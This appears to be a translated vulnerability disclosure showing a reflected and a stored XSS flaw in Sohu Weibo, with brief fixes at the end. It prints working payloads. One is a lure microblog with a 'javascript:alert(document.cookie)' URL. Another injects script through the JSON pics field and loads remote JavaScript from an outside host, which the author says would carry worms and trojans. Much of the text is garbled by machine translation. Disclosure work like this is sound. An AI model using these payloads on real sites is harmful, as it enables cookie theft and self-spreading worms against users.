Sohu Weibo has one content storage XSS and N reflective XSS

1. Vulnerability 1: reflected XSS.
 
Vulnerability URL: http://t.sohu.com/m/3398041534 (any microblogging can be ~~)
 
Vulnerability functions:
 
 
(Function (){
Var originalUrl = window. location. href,
ToUrl = originalUrl. indexOf ('#')! =-1 & originalUrl. split ('#') [1];
If (toUrl ){
Window. location. href = toUrl;
}
})();
 
The toUrl is not filtered during URL jump.
 
Vulnerability exploitation: Send a microblog WITH THE CONTENT
Amazing XXX movie, the strongest Ray cast in history, @ who, @ who, http://t.sohu.com/m/3398041534/#javascript:alert%28document.cookie%29%3B
 
Click here. For more information, see vulnerability proof!
 
This first vulnerability is more powerful ..
 
This vulnerability function is available on almost all pages of Sohu Weibo.
 
For example: http://t.sohu.com/home (after login, directly www.2cto.com http://t.sohu.com/home#javascript:alert (document. cookie); visible effect .)
 
 
Because http://t.sohu.com/m/mongod+ and the http://t.sohu.com/.+ both have the XSS,
So I am talking about 1 x N reflective XSS.
 
Platform: valid in IE and Chrome.
 
Besides,
 
Compared with traditional reflection-type vulnerabilities, adding <script> xxx </script> or something is easily blocked by the protection provided by IE and other browsers.
 
This location. href = "javascript: xxxx" will not be affected. Therefore, this hole is more advantageous.
 
------------------------- Gorgeous split line --------------------
 
2. Vulnerability 2: content storage XSS.
 
When submitting Weibo content: the pics field is JSON data. The url in the JSON data is filtered by double quotation marks, but not by single quotation marks. This causes cross-site access.
 
Construct the following reason code: xxx.png ', a :( function () {alert ('xx') ;}) (), B :'
 
 
[{"Url": "functions (function () {alert ('xx') ;}) (), B: '", "extraData": {"smallest ": {& quot; w & quot;: 64, & quot; h & quot;: 64, & quot; size & quot;: 1123}, & quot; small & quot;: {& quot; w & quot;: 64, & quot; h & quot;: 64, "size": 1123}, "middle": {"w": 64, "h": 64, "size": 1123}, "big": {"w ": 64, "h": 64, "size": 1123 }}]
 
After sending this microblog, other users can click the content image to trigger it.
 
The image length is limited. After checking the source code, Sohu Weibo uses jquery to directly call jQuery's getScript function. Call JS outside the site.
 
 
[{"Url": "http://s1.t.itc.cn/mblog/pic/20125_2_12/s_123.png', A: (function () {jQuery. getScript ('// xss' + 'report .sinaapp.com/1.js')}) (), B:' "," extraData ": {" smallest ": {" w ": 64, "h": 64, "size": 1123}, "small": {"w": 64, "h": 64, "size": 1123 }, "middle": {"w": 64, "h": 64, "size": 1123}, "big": {"w": 64, "h ": 64, "size": 1123 }}]
 
The rest is done in our JS ~~ Worms and Trojans ~
 
For details about the effect, see the image proof.



 
 
 
Solution:

1. For the reflected type, modify the vulnerability function and use regular expressions to determine the address of the # source.
2. This storage type filters single quotes in the url
From gainover